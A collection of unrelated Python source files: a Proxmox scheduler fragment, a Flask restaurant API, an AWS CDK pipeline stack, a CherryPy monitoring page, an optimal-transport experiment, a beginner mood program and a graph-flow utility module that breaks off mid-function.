logging.debug( 'proxmox: host "{0}", low aviable cores: "{1}"'.format( node[ 'node' ], cpu_aviable ) )
continue
node_map[ node[ 'node' ] ] = paramaters[ 'scalers' ][ 'memory' ] * ( memory_aviable / total_memory )
node_map[ node[ 'node' ] ] += paramaters[ 'scalers' ][ 'cpu' ] * cpu_utilization_aviable
node_map[ node[ 'node' ] ] += paramaters[ 'scalers' ][ 'io' ] * ( 1.0 - min( 1.0, status[ 'wait' ] ) )
node_map[ node[ 'node' ] ] += paramaters[ 'scalers' ][ 'vm' ] * ( 1.0 / vm_count )
logging.debug( 'proxmox: node_map {0}'.format( node_map ) )
result = list( node_map.keys() )
result.sort( key=lambda a: node_map[ a ], reverse=True )
return { 'node_list': result }
|
from flask import Flask
from flask import render_template
from flask import jsonify
import json
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine
from config import username, password
# Postgresql Database info
database_name = 'michelin_restaurant_db'
connection_string = f'postgresql://{username}:{password}@localhost:5432/{database_name}'
# Connect to the database
engine = create_engine(connection_string)
base = automap_base()
base.prepare(engine, reflect=True)
# Tables to use
one_star_restaurants = base.classes.one_star_restaurant
two_star_restaurants = base.classes.two_star_restaurant
three_star_restaurants = base.classes.three_star_restaurant
# Flask setup
app = Flask(__name__)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0 # Effectively disables page caching
@app.route('/')
def Index():
webpage = render_template("about.html")
return webpage
@app.route('/kiosk')
def Kiosk():
webpage = render_template("index.html")
return webpage
@app.route('/cost')
def cost():
webpage = render_template("radar.html")
return webpage
@app.route('/restaurants')
def Restaurants():
# This route will return all restaurants including one, two and three star varieties
session = Session(engine)
one_star_results = session.query(one_star_restaurants.name,
one_star_restaurants.cuisine,
one_star_restaurants.url,
one_star_restaurants.starRating,
one_star_restaurants.latitude,
one_star_restaurants.longitude).all()
two_star_results = session.query(two_star_restaurants.name,
two_star_restaurants.cuisine,
two_star_restaurants.url,
two_star_restaurants.starRating,
two_star_restaurants.latitude,
two_star_restaurants.longitude).all()
three_star_results = session.query(three_star_restaurants.name,
three_star_restaurants.cuisine,
three_star_restaurants.url,
three_star_restaurants.starRating,
three_star_restaurants.latitude,
three_star_restaurants.longitude).all()
session.close
all_restaurants = []
for name, cuisine, url, starRating, latitude, longitude in one_star_results:
dict = {}
dict["name"] = name
dict["cuisine"] = cuisine
dict["url"] = url
dict["starRating"] = starRating
dict["latitude"] = latitude
dict["longitude"] = longitude
all_restaurants.append(dict)
for name, cuisine, url, starRating, latitude, longitude in two_star_results:
dict = {}
dict["name"] = name
dict["cuisine"] = cuisine
dict["url"] = url
dict["starRating"] = starRating
dict["latitude"] = latitude
dict["longitude"] = longitude
all_restaurants.append(dict)
for name, cuisine, url, starRating, latitude, longitude in three_star_results:
dict = {}
dict["name"] = name
dict["cuisine"] = cuisine
dict["url"] = url
dict["starRating"] = starRating
dict["latitude"] = latitude
dict["longitude"] = longitude
all_restaurants.append(dict)
# Return the jsonified result.
return jsonify(all_restaurants)
@app.route('/one-star')
def OneStar():
# This route returns just the one star restaurants
session = Session(engine)
one_star_results = session.query(one_star_restaurants.name,
one_star_restaurants.cuisine,
one_star_restaurants.price,
one_star_restaurants.url,
one_star_restaurants.latitude,
one_star_restaurants.longitude).all()
session.close
restaurants = []
for name, cuisine, price, url, latitude, longitude in one_star_results:
dict = {}
dict["name"] = name
dict["cuisine"] = cuisine
dict["price"] = price
dict["url"] = url
dict["latitude"] = latitude
dict["longitude"] = longitude
restaurants.append(dict)
# Return the jsonified result.
return jsonify(restaurants)
@app.route('/two-star')
def TwoStar():
# This route returns just the two star restaurants
session = Session(engine)
two_star_results = session.query(two_star_restaurants.name,
two_star_restaurants.cuisine,
two_star_restaurants.price,
two_star_restaurants.url,
two_star_restaurants.latitude,
two_star_restaurants.longitude).all()
session.close
restaurants = []
for name, cuisine, price, url, latitude, longitude in two_star_results:
dict = {}
dict["name"] = name
dict["cuisine"] = cuisine
dict["price"] = price
dict["url"] = url
dict["latitude"] = latitude
dict["longitude"] = longitude
restaurants.append(dict)
# Return the jsonified result.
return jsonify(restaurants)
@app.route('/three-star')
def ThreeStar():
# This route returns just the thee star restaurants
session = Session(engine)
three_star_results = session.query(three_star_restaurants.name,
three_star_restaurants.cuisine,
three_star_restaurants.price,
three_star_restaurants.url,
three_star_restaurants.latitude,
three_star_restaurants.longitude).all()
session.close
restaurants = []
for name, cuisine, price, url, latitude, longitude in three_star_results:
dict = {}
dict["name"] = name
dict["cuisine"] = cuisine
dict["price"] = price
dict["url"] = url
dict["latitude"] = latitude
dict["longitude"] = longitude
restaurants.append(dict)
# Return the jsonified result.
return jsonify(restaurants)
if __name__ == '__main__':
app.run(debug=True) |
n=int(input())%1440
y=n%60
x=(n-y)//60
print(x,y) |
from game.items import NormalLog
from game.models.model import Tree
from game.skills import SkillTypes
class CommonTree(Tree):
name = 'Common Tree'
health = 1
xp = {SkillTypes.woodcutting: 25}
skill_requirement = {SkillTypes.woodcutting: 1, SkillTypes.firemaking: 1}
resource = NormalLog
|
#coding:utf-8
from django.db import models
from django.contrib.auth.models import User,AnonymousUser
# Create your models here.
# class Application(models.Model):
# user = models.ForeignKey(User)
# name = models.CharField( max_length=100 ,null=True)
# description = models.CharField( max_length= 1000,null=True)
#
# class Module(models.Model):
# app = models.ForeignKey(Application)
# name = models.CharField( max_length=100 ,null=True)
# description = models.CharField( max_length= 1000,null=True)
#
# class ApiDoc(models.Model):
# """
#
# """
# class Meta:
# unique_together = ()
# GET = 'get'
# POST = 'post'
# PUT = 'put'
# DELETE = 'delete'
#
# CHOICE_METHOD =(
# (GET,GET),
# (POST,POST),
# (PUT,PUT),
# (DELETE,DELETE)
# )
#
#
#
#
# app = models.ForeignKey(Application)
# module = models.ForeignKey(Module,null=True)
#
# doc_id = models.CharField( max_length= 40 )
# name = models.CharField( max_length=100 ,null=True)
# description = models.CharField( max_length= 1000,null=True)
# url = models.CharField(max_length= 200)
# method = models.CharField(max_length=20,default=GET,choices=CHOICE_METHOD)
#
# UTF8 = 'utf-8'
# CHOICE_CHAR_ENCODING =(
# (UTF8,UTF8),
# )
#
# CONTENT_TYPE_X_FORM = 'x-www-form-urlencoded'
# CONTENT_TYPE_JSON = 'json'
# CONTENT_TYPE_XML = 'xml'
# CONTENT_TYPE_YAML = 'yaml'
#
# CHOICE_CONTENT_TYPE=(
# (CONTENT_TYPE_X_FORM,CONTENT_TYPE_X_FORM),
# (CONTENT_TYPE_JSON,CONTENT_TYPE_JSON),
# (CONTENT_TYPE_XML,CONTENT_TYPE_XML),
# (CONTENT_TYPE_YAML,CONTENT_TYPE_YAML)
# )
#
#
# class Body(models.Model):
# doc = models.ForeignKey(ApiDoc)
# char_encoding = models.CharField(max_length=40,choices=CHOICE_CHAR_ENCODING,default=UTF8)
# content_type = models.CharField(max_length=60,choices=CHOICE_CONTENT_TYPE,default=CONTENT_TYPE_X_FORM)
#
# # errors = models.ManyToManyField(ErrorDef)
# class Parameter(models.Model):
# INT = 'int'
# STRING = 'string'
# BOOL = 'bool'
# CHOICE_VALUE_TYPE=(
# (INT,INT),
# (STRING,STRING),
# (BOOL,BOOL)
# )
# doc = models.ForeignKey(ApiDoc)
# name = models.CharField(max_length=40)
# description = models.CharField(max_length=200,null=True)
# value_type = models.CharField(max_length=40,choices=CHOICE_VALUE_TYPE,default=STRING)
#
#
# class ErrorDef(models.Model):
# # app = models.ForeignKey(Application)
# doc = models.ForeignKey(ApiDoc)
# code = models.CharField(max_length=20,db_index=True,verbose_name=u'错误编码')
# message = models.CharField(max_length=200,null=True)
|
"""
This is a setup.py script generated by py2applet
Usage:
python setup.py py2app
"""
from setuptools import setup
APP = ['../main.py']
DATA_FILES = ['../Resources/SolarFarmDiagram.bmp','../Resources/currencyList.txt','../Resources/help.html']
OPTIONS = {'argv_emulation': False}
setup(
name="Solar Farm Calculator",
version="v0.1",
app=APP,
data_files=DATA_FILES,
options={'py2app': OPTIONS},
setup_requires=['py2app'],
)
|
from dotenv import dotenv_values
from aws_cdk import (
core,
)
from collections import OrderedDict
from .common_resources import CommonResourceStack
from .stage_resources import StageResourceStack
from .app_pipeline import AppPipelineStack
class BackstageStack(core.Stack):
def __init__(self, scope: core.Construct, construct_id: str, props: dict, stages: dict, **kwargs) -> None:
super().__init__(scope, construct_id, **kwargs)
crs = CommonResourceStack( self, "infra-common-resources", props)
pipeline = AppPipelineStack(self, 'backstage-app-pipeline', props, crs)
# we add deploy stages to the pipeline based on stages dict.
for name,stage in stages.items():
# dont pass these into the ECS container env.
approval = stage.pop('STAGE_APPROVAL', False)
emails = stage.pop('APPROVAL_EMAILS', None)
# overload the shared env vars with those for the stage specifics if required.
props = {
**props,
**stage
}
srs = StageResourceStack(self, name, props, crs)
# add a ECS deploy stage with the stage specific service, and an approval stage if requested.
pipeline.add_deploy_stage(name, srs.ecs_stack.service, approval, emails)
### build a codepipeline for building new images and re-deploying to ecs
### this will use the backstage app repo as source to catch canges there
### execute a docker build and push image to ECR
### then execute ECS deployment
### once this pipeline is built we should only need to commit changes
### to the backstage app repo to deploy and update
# create the output artifact space for the pipeline
source_output = codepipeline.Artifact()
build_output = codepipeline.Artifact()
# setup source to be the backstage app source
source_action = actions.GitHubSourceAction(
oauth_token=github_token_secret.secret_value_from_json("secret"),
owner=github_org,
repo=github_repo,
branch='main',
action_name="Github-Source",
output=source_output
)
# make codebuild action to use buildspec.yml and feed in env vars from .env
# this will build and push new image to ECR repo
build_project = codebuild.PipelineProject(
self,
"CodebuildProject",
build_spec=codebuild.BuildSpec.from_object(build_spec),
#build_spec=codebuild.BuildSpec.from_source_filename('buildspec.yml'),
environment=codebuild.BuildEnvironment(build_image=codebuild.LinuxBuildImage.STANDARD_4_0, privileged=True),
)
policy = iam.ManagedPolicy.from_aws_managed_policy_name("AmazonEC2ContainerRegistryPowerUser")
build_project.role.add_managed_policy(policy)
# code build action will use docker to build new image and push to ECR
# the buildspec.yaml is in the backstage app repo
repo_uri = docker_asset.repository.repository_uri
build_action = actions.CodeBuildAction(
action_name="Docker-Build",
project=build_project,
input=source_output,
outputs=[build_output],
environment_variables={
"REPOSITORY_URI": codebuild.BuildEnvironmentVariable(value=repo_uri),
"AWS_REGION": codebuild.BuildEnvironmentVariable(value=props.get("AWS_REGION")),
"CONTAINER_NAME": codebuild.BuildEnvironmentVariable(value=props.get("CONTAINER_NAME"))
},
)
# ECS deploy action will take file made in build stage and update the service with new image
deploy_action = actions.EcsDeployAction(
service=ecs_stack.service,
action_name="ECS-Deploy",
input=build_output,
)
pipeline = codepipeline.Pipeline(self, "fccbackstagepipeline", cross_account_keys=False)
pipeline.add_stage(
stage_name="Source",
actions=[source_action]
)
pipeline.add_stage(
stage_name="Build",
actions=[build_action]
)
pipeline.add_stage(
stage_name="Deploy",
actions=[deploy_action]
) |
import requests
import os
import time
import json
#TODO json 解析
file = "D:/locked.csv"
file_line = open(file)
all_lines = file_line.readlines()
i=0
for num in all_lines:
# 判断是否是数字
#
if((num!="\r\n")&num.isdigit()):
print("开始解锁ID = "+num)
i+=1
url ="https://utc.365sale.com/wenzhou/consumer/rest/v11/promoters/"+num.strip()+"/unlock"
print("发送请求 "+url)
headers={'Content-Type':'application/json'}
r = requests.put(url,headers=headers)
print(r.text)
print("id "+num.strip()+" 已解锁")
print("请稍等。。。\n")
time.sleep(3)# 等待3s ,否则服务器Dos
else:
pass
file_line.close()
print("解锁处理完成 "+str(i))#must be str not int
|
class Value:
pass
class Integer(Value):
def __init__(self, value):
self.value = value
def __repr__(self):
return '<Integer %d>' % self.value
class String(Value):
def __init__(self, value):
self.value = value
def __repr__(self):
return '<String %r>' % self.value
class Application(Value):
def __init__(self, operation, op1, op2):
self.operation = operation
self.op1 = op1
self.op2 = op2
def __repr__(self):
return '<Application %s(%s, %s)>' % (self.operation, self.op1, self.op2)
|
import numpy as np
import ot
import matplotlib.pyplot as plt
import scipy
# 2D
n = 100 # nb bins
# bin positions
x = np.arange(n, dtype=np.float64)
# a1 = np.ones((n,20)) * 0.001 # m= mean, s= std
# a2 = np.ones((n,20)) * 0.001
# a1[10:20] = 1
# a2[60:70] = 1
# arti = np.vstack((a1.reshape(1,2000), a2.reshape(1,2000)))
# # signal is in the middle of image
# a1 = np.ones((n,20)) * 0.001
# a2 = np.ones((n,20)) * 0.001
# a1[10:20,7:13] = 1
# a2[60:70,7:13] = 1
# arti = np.vstack((a1.reshape(1,2000), a2.reshape(1,2000)))
#signal is not in the middle of image
a1 = np.ones((n,20)) * 0.001
a2 = np.ones((n,20)) * 0.001
a1[10:20,3:9] = 1
a2[80:90,11:17] = 1
arti = np.vstack((a1.reshape(1,2000), a2.reshape(1,2000)))
# # artificial data
# # arti_data = scipy.io.loadmat('/home/qiwang/Downloads/artificial_data.mat')
# arti_data = scipy.io.loadmat('/hpc/crise/wang.q/data/artificial_data.mat')
# arti = arti_data['x']
# # arti = np.vstack((arti[1][:,18:26].reshape((1,480)),arti[42][:,18:26].reshape((1,480))))
# a1 = arti[0]
# a2 = arti[50]
# arti = np.vstack((a1.reshape(1,5400), a2.reshape(1,5400)))
arti_dis = np.empty(arti.shape)
for i in range(arti.shape[0]):
data = arti[i] - np.min(arti[i])
data /= np.sum(data)
arti_dis[i] = data
A = np.transpose(arti_dis)
# arti = np.transpose(arti)
alpha = 1/A.shape[1] # 0<=alpha<=1
weights = np.ones(A.shape[1]) * alpha
# bary_l2 = A.dot(weights)
reg = 1/800
# M with 2d coordinates
nx, ny = a1.shape
x = np.linspace(0,1,nx)
y = np.linspace(0, 1, ny)
xv, yv = np.meshgrid(y,x)
coors = np.vstack((xv.flatten(), yv.flatten())).T
coor = np.empty(coors.shape)
coor[:,0] = coors[:,1]
coor[:,1] = coors[:,0]
M_image = ot.utils.dist(coor)
N = 1
# M = np.sqrt(M)
M_image /= np.max(M_image) * N
bary_wass_image, log = ot.bregman.barycenter(A, M_image, reg, weights,
numItermax=100, log=True)
M_vector = ot.utils.dist0(A.shape[0])
# M = np.sqrt(M)
N = 1
M_vector /= np.max(M_vector) * N
bary_wass_vector, log = ot.bregman.barycenter(A, M_vector, reg, weights,
numItermax=100, log=True)
plt.figure()
plt.subplot(1,4,1)
plt.imshow(a1)
plt.title('image 1')
plt.subplot(1,4,2)
plt.imshow(a2)
plt.title('image 2')
plt.subplot(1,4,3)
plt.imshow(bary_wass_vector.reshape(a1.shape))
plt.title('barycenter with \nvector distance matrix')
plt.subplot(1,4,4)
plt.imshow(bary_wass_image.reshape(a1.shape))
plt.title('barycenter with \nimage distance matrix')
# different weights for M_image
M_image = ot.utils.dist(coor)
Ns = [0.1, 0.2, 0.5, 1, 5]
plt.figure()
plt.subplot(1, 7, 1)
plt.imshow(a1)
plt.title('image 1')
plt.subplot(1, 7, 2)
plt.imshow(a2)
plt.title('image 2')
for i in range(len(Ns)):
N = Ns[i]
# M = np.sqrt(M)
M_image1 = M_image / (np.max(M_image) * N)
bary_wass_image1, log = ot.bregman.barycenter(A, M_image1, reg, weights,
numItermax=100, log=True)
plt.subplot(1, 7, i + 3)
plt.imshow(bary_wass_image1.reshape(a1.shape))
plt.title('barycenter\n{}'.format(N))
# steps in algorithm
K = np.exp(-M / reg)
K[K<1e-300] = 1e-300
UKv = np.dot(K, np.divide(A.T, np.sum(K, axis=0)).T)
u = (ot.bregman.geometricMean(UKv) / UKv.T).T
# UKv = u * np.dot(K, np.divide(A, np.dot(K, u)))
# u = (u.T * ot.bregman.geometricBar(weights, UKv)).T / UKv
barycenter = ot.bregman.geometricBar(weights, UKv)
plt.figure()
plt.subplot(1,6,1)
plt.imshow(M)
plt.title(N)
plt.subplot(1,6,2)
plt.imshow(K)
plt.subplot(1,6,3)
for i in range(A.shape[1]):
plt.plot(x, A[:, i])
plt.title('A, 2d')
plt.subplot(1,6,4)
for i in range(UKv.shape[1]):
plt.plot(x, UKv[:, i])
plt.title('UKv, 2d')
plt.subplot(1,6,5)
plt.plot(x, barycenter)
plt.title('bary_wass, 2d')
plt.subplot(1,6,6)
for i in range(u.shape[1]):
plt.plot(x, u[:,i])
plt.title('u, 2d')
|
#!/usr/bin/env python
"""
The documentation for the framework
"""
import cherrypy
from cherrypy import expose
from WMCore.WebTools.Page import TemplatedPage
from os import path
from cherrypy import HTTPError
from cherrypy.lib.static import serve_file
def serveFile(contentType, prefix, *args):
"""Return a workflow from the cache"""
name = path.normpath(path.join(prefix, *args))
if path.commonprefix([name, prefix]) != prefix:
raise HTTPError(403)
if not path.exists(name):
raise HTTPError(404, "Page not found")
return serve_file(name, content_type = contentType)
class WMBSMonitorPage(TemplatedPage):
"""
The documentation for the framework
"""
@expose
@cherrypy.tools.secmodv2()
def index(self):
"""
The index of the documentation
"""
return serveFile('text/html', self.config.html, 'WMBS', 'index.html')
@expose
@cherrypy.tools.secmodv2()
def default(self, *args):
"""
Show the documentation for a page or return the index
"""
if len(args) > 0:
return serveFile('text/html',
path.join(self.config.html, 'WMBS'),*args)
else:
return self.index()
@expose
@cherrypy.tools.secmodv2()
def javascript(self, *args):
if args[0] == "external":
return serveFile('application/javascript',
path.join(self.config.javascript), *args)
return serveFile('application/javascript',
path.join(self.config.javascript,
'WMCore', 'WebTools'), *args)
@expose
@cherrypy.tools.secmodv2()
def css(self, *args):
if args[0] == "external":
return serveFile('text/css',
self.config.css, *args)
return serveFile('text/css',
path.join(self.config.css,
'WMCore', 'WebTools'), *args)
@expose
@cherrypy.tools.secmodv2()
def template(self, *args, **kwargs):
"""
Show the documentation for a page or return the index
"""
if len(args) > 0:
return self.templatepage(args[0], **kwargs)
# make not found page
return self.index()
@expose
@cherrypy.tools.secmodv2()
def wmbsStatus(self, subscriptionType = "All"):
"""
_wmbsStatus_
Render the main monitoring page that displays the status for all
subscriptions in WMBS. The page itself takes a single parameter from
the webserver:
subType - The type of subscription to display. This will default to
All.
The template itself will take the subscription type and the WMBS
instance name from the config.
"""
return self.templatepage("WMBS", subType = subscriptionType,
instance = "WMBS")
@expose
@cherrypy.tools.secmodv2()
def subscriptionStatus(self, subscriptionId):
"""
_subscriptionStatus_
Render the subscription status page. The page itself takes a single
mandatory parameter from the webserver:
subscriptionId - The id of the subscription to display.
"""
return self.templatepage("WMBSSubscription",
subscriptionId = int(subscriptionId))
@expose
@cherrypy.tools.secmodv2()
def jobStatus(self, jobState = "success", interval = 7200):
"""
_jobStatus_
Render the job status page. The page itself takes two parameters
from the webserver:
jobState - What state is displayed
interval - The amount of time to display
The defaults will be the success state and 2 hours. The template itself
takes the jobState interval, the wmbs instance name and a URL used to
display the content of couch documents for jobs.
"""
return self.templatepage("WMBSJobStatus", jobState = jobState,
interval = int(interval),
instance = self.config.instance,
couchURL = self.config.couchURL)
|
# Komputer nastrojów
# Demonstruje klauzulę elif w instrukcji if
import random
print("Wyczuwam Twoją energię użytkowniku. Twoje prawdziwe emocje znajdują odbiie na moim ekranie.")
print("Jesteś...")
mood = random.randint(1,3)
if mood == 1:
# szczęśliwy
print(
"""
-----------
| |
| O O |
| < |
| |
| . . |
| `...` |
-----------
""")
elif mood == 2:
# obojętny
print(
"""
-----------
| |
| O O |
| < |
| |
| ------ |
| |
-----------
""")
elif mood == 3:
# smutny
print(
"""
-----------
| |
| O O |
| < |
| |
| .'. |
| ' ' |
-----------
""")
else:
print("Nieprawidłowa wartość nastroju! (musisz być naprawdę w złym humorze.")
print("...dzisiaj.")
input("\n\nAby zakończyć program kliknj Enter.")
|
from typing import *
import numpy as np
import pandas as pd
import scipy.stats as stats
from scipy import sparse as sp
import torch
class Graph(object):
def __init__(self, num_nodes: int, edges: np.ndarray, flow: np.ndarray = None):
self._verify(num_nodes, edges, flow)
self._num_nodes = num_nodes
self.edges = edges.astype(np.int64)
self._flow = flow
self._degrees = np.zeros(num_nodes)
nodes, degree = np.unique(np.concatenate((self.edges[:, 0], self.edges[:, 1])), return_counts=True)
self._degrees[nodes] = degree
if flow is not None:
self.set_flow(flow)
self._indexed_edge = pd.Series(data=range(len(self.edges)), index=self._edges2index(self.edges))
def set_flow(self, flow: np.ndarray):
assert len(flow) == self.num_edges
self._flow = flow.astype(np.float32)
@staticmethod
def _verify(num_nodes, edges, flow):
if len(edges) == 0:
return
assert edges.max() < num_nodes
assert (edges[:, 0] <= edges[:, 1]).all()
@classmethod
def read_csv(cls, path):
with open(path, 'r') as fp:
num_nodes_line = fp.readline()
num_nodes = int(num_nodes_line.strip("#\n"))
df = pd.read_csv(fp, names=["src", "dst", "flow"],
dtype={"src": np.int64, "dst": np.int64, "flow": np.float64})
flow = None if df.loc[:, "flow"].isnull().all() else df.loc[:, "flow"].to_numpy()
return cls(num_nodes, edges=df.loc[:, ["src", "dst"]].to_numpy(), flow=flow)
def to_csv(self, path):
with open(path, 'w') as fp:
fp.write("#" + str(self.num_nodes) + "\n")
pd.DataFrame(
{"src": self.edges[:, 0], "dst": self.edges[:, 1], "flow": self.flow}
).to_csv(fp, mode='a', header=False, index=False)
@property
def degrees(self):
return self._degrees
@property
def src_nodes(self):
return self.edges[:, 0]
@property
def dst_nodes(self):
return self.edges[:, 1]
@property
def flow(self):
return self._flow
@property
def num_nodes(self):
return self._num_nodes
def num_vertices(self):
return self.num_nodes
@property
def num_edges(self):
return self.edges.shape[0]
def _edges2index(self, edges):
return edges[:, 0] * self.num_nodes + edges[:, 1]
def edges2index(self, edges):
return self._indexed_edge[self._edges2index(edges)].to_numpy()
def grad_matrix(self):
columns = np.concatenate((self.dst_nodes, self.src_nodes), axis=0)
values = np.concatenate((np.ones(self.num_edges), -np.ones(self.num_edges)), axis=0)
rows = np.concatenate((np.arange(self.num_edges), np.arange(self.num_edges)))
grad_matrix = sp.coo_matrix((values, (rows, columns)), shape=(self.num_edges, self.num_nodes)).tocsr()
return grad_matrix
def split_train_val_test_filters(self,
desired_split=(0.7, 0.2, 0.1),
required_train: Optional[np.ndarray] = None,
required_val: Optional[np.ndarray] = None,
required_test: Optional[np.ndarray] = None
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
num_train, num_val, num_test = self.num_edges * np.concatenate(
(np.asarray(desired_split)[:3] / np.sum(desired_split),
np.zeros(max(0, 3 - len(desired_split)))))
num_val = int(num_val)
num_test = int(num_test)
num_train = self.num_edges - num_val - num_test
train_filter = np.zeros(self.num_edges, dtype=bool) if required_train is None else required_train
val_filter = np.zeros(self.num_edges, dtype=bool) if required_val is None else required_val
test_filter = np.zeros(self.num_edges, dtype=bool) if required_test is None else required_test
tree_edges = self.random_min_spanning_tree()
tree_indices = self.edges2index(tree_edges)
train_filter[tree_indices] = True
remaining_edge_indices = np.random.permutation(
np.logical_not(train_filter | val_filter | test_filter).nonzero()[0]
)
if len(remaining_edge_indices) > 0:
current_num_train = int(train_filter.sum().item())
num_additional_train_edges = max(num_train - current_num_train, 0)
train_filter[remaining_edge_indices[:num_additional_train_edges]] = True
remaining_edge_indices = remaining_edge_indices[num_additional_train_edges:]
num_val = int((float(num_val) / (num_val + num_test)) * len(remaining_edge_indices))
num_additional_val = max(num_val - int(val_filter.sum().item()), 0)
val_filter[remaining_edge_indices[:num_additional_val]] = True
remaining_edge_indices = remaining_edge_indices[num_additional_val:]
test_filter[remaining_edge_indices] = True
return train_filter, val_filter, test_filter
def split_train_val_test_edges(self,
desired_split=(0.7, 0.2, 0.1),
required_train: Optional[np.ndarray] = None,
required_val: Optional[np.ndarray] = None,
required_test: Optional[np.ndarray] = None
) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:
train_filter, val_filter, test_filter = self.split_train_val_test_filters(
desired_split=desired_split, required_train=required_train,
required_val=required_val, required_test=required_test
)
train_edges = self.edges[train_filter]
val_edges = self.edges[val_filter]
test_edges = self.edges[test_filter]
return train_edges, val_edges, test_edges
def split_train_val_test_graphs(self,
desired_split=(0.7, 0.2, 0.1),
required_train: Optional[np.ndarray] = None,
required_val: Optional[np.ndarray] = None,
required_test: Optional[np.ndarray] = None
) -> Tuple['Graph', 'Graph', 'Graph']:
train_filter, val_filter, test_filter = self.split_train_val_test_filters(
desired_split=desired_split, required_train=required_train,
required_val=required_val, required_test=required_test
)
train_edges = self.edges[train_filter]
val_edges = self.edges[val_filter]
test_edges = self.edges[test_filter]
if self.flow is not None:
train_graph = Graph(self.num_nodes, train_edges, flow=self.flow[train_filter])
val_graph = Graph(self.num_nodes, val_edges, flow=self.flow[val_filter])
test_graph = Graph(self.num_nodes, test_edges, flow=self.flow[test_filter])
else:
train_graph = Graph(self.num_nodes, train_edges)
val_graph = Graph(self.num_nodes, val_edges)
test_graph = Graph(self.num_nodes, test_edges)
return train_graph, val_graph, test_graph
def random_min_spanning_tree(self):
random_weights = np.random.rand(self.num_edges)
adj = sp.coo_matrix(
(random_weights, (self.src_nodes, self.dst_nodes)), shape=(self.num_nodes, self.num_nodes)
).tocsr()
min_tree = sp.csgraph.minimum_spanning_tree(adj).tocoo()
return np.stack((min_tree.row, min_tree.col), axis=1).astype(np.int64)
def __repr__(self):
return '{}({} nodes, {} edges)'.format(self.__class__.__name__, self.num_nodes, self.num_edges)
# ========================================================================================
# =========================== Generate random networks ==================================
# ========================================================================================
def complete_graph(num_nodes: int):
lower_triu_max = sp.triu(np.ones((num_nodes, num_nodes)), k=1, format='coo')
edges = np.stack((lower_triu_max.row, lower_triu_max.col), axis=1)
return Graph(num_nodes=num_nodes, edges=edges)
def sample_noise(num_samples: int, dim: int, df: Union[str, float]):
if df == 'normal' or df > 10:
r = stats.norm.rvs(size=(num_samples, dim)).astype(np.float32)
else:
r = stats.t.rvs(df=df, size=(num_samples, dim)).astype(np.float32)
return r
def add_sheaf_flow(graph: Graph, sheaf_flow_model):
sources, targets = graph.src_nodes, graph.dst_nodes
sources_torch = torch.from_numpy(sources).to(sheaf_flow_model.node_embeddings.weight.device)
targets_torch = torch.from_numpy(targets).to(sheaf_flow_model.node_embeddings.weight.device)
with torch.no_grad():
gt_flow = sheaf_flow_model(sources_torch, targets_torch)
graph.set_flow(gt_flow.detach().cpu().numpy())
grad_flow, harmonic_flow = decompose_flow(sources, targets, graph.flow, graph.num_nodes)
grad_norm = np.linalg.norm(grad_flow)
harmonic_norm = np.linalg.norm(harmonic_flow)
summary = flow_summary(graph.flow)
summary.update({'grad_norm': grad_norm, 'harmonic_norm': harmonic_norm})
return graph, summary
def flow_summary(flow, cutoff: float = 1e-10):
ratio_positive = (np.sign(flow) > 0).sum() / len(flow)
mean_magnitude = np.mean(np.log10(np.maximum(np.abs(flow), cutoff)))
mean_value = np.mean(np.abs(flow))
max_value = np.max(np.abs(flow))
flow_std = np.std(flow)
flow_norm = np.linalg.norm(flow)
return {'num_edges': len(flow), 'flow_ratio_p': ratio_positive, 'flow_mean_mag': mean_magnitude,
'flow_mean_value': mean_value, 'flow_max_value': max_value, 'flow_std': flow_std,
'flow_norm': flow_norm}
def compute_indicence_matrix(source_nodes, target_nodes, num_nodes, num_edges):
leaving = source_nodes
arriving = target_nodes
columns = np.concatenate((arriving, leaving), axis=0)
values = np.concatenate((np.ones(num_edges), -np.ones(num_edges)), axis=0)
rows = np.concatenate((np.arange(num_edges), np.arange(num_edges)))
incidence_matrix = sp.coo_matrix((values, (rows, columns)), shape=(num_edges, num_nodes)).tocsr()
return incidence_matrix
def compute_flow_potentials(source_nodes, target_nodes, flow, num_nodes, return_indicence=False):
num_edges = len(flow)
incidence_matrix = compute_indicence_matrix(source_nodes, target_nodes, num_nodes, num_edges)
potentials, istop, itn, normr = sp.linalg.lsqr(incidence_matrix, flow)[:4]
if return_indicence:
return potentials, incidence_matrix
return potentials
def decompose_flow(source_nodes, target_nodes, flow, num_nodes):
potentials, incidence_matrix = compute_flow_potentials(source_nodes, target_nodes, flow, num_nodes,
return_indicence=True)
grad_flow = incidence_matrix.dot(potentials)
harmonic_flow = flow - grad_flow
return grad_flow, harmonic_flow
def decompose_flow_normalized(source_nodes, target_nodes, flow, num_nodes):
grad_flow, harmonic_flow = decompose_flow(source_nodes, target_nodes, flow, num_nodes)
grad_norm = np.linalg.norm(grad_flow)
normalized_grad_flow = grad_flow / grad_norm
harmonic_norm = np.linalg.norm(harmonic_flow)
normalized_harmonic_flow = harmonic_flow / harmonic_norm
return normalized_grad_flow, grad_norm, normalized_harmonic_flow, harmonic_norm
def sample_gmm_from_mu(n, mu, std):
k, dim = mu.shape
num_repeats = int(np.ceil(n / k))
samples = np.repeat(mu, num_repeats, 0)
samples += std * np.random.randn(*samples.shape)
component_ids = np.repeat(np.arange(k), num_repeats)
permutation = np.random.permutation(samples.shape[0])[:n]
return samples[permutation, :], component_ids[permutation]
def sample_t_from_mu(n, mu, std):
k, dim = mu.shape
num_repeats = int(np.ceil(n / k))
samples = np.repeat(mu, num_repeats, 0)
samples += std * stats.t(df=2).rvs(size=samples.shape)
component_ids = np.repeat(np.arange(k), num_repeats)
permutation = np.random.permutation(samples.shape[0])[:n]
return samples[permutation, :], component_ids[permutation]
def sample_t_from_mu_and_ids(mu, std, component_ids):
comps, inverse = np.unique(component_ids, return_inverse=True)
samples = mu[inverse, :]
samples += std * stats.t(df=2).rvs(size=samples.shape)
return samples, component_ids
def sample_gmm_from_mu_and_ids(mu, std, component_ids):
comps, inverse = np.unique(component_ids, return_inverse=True)
samples = mu[inverse, :]
samples += std * np.random.randn(*samples.shape)
return samples, component_ids
def sample_2modes_2d(n, std, num_sigma=6, num_cross_dims=2, component_ids=None):
radius = num_sigma * std / 2
if num_cross_dims > 1:
mu = np.array([[radius, radius], [-radius, -radius]])
elif num_cross_dims == 1:
mu = np.array([[radius, 0], [-radius, 0]])
else:
mu = np.zeros((2, 2))
if component_ids is None:
samples, component_ids = sample_gmm_from_mu(n, mu, std)
else:
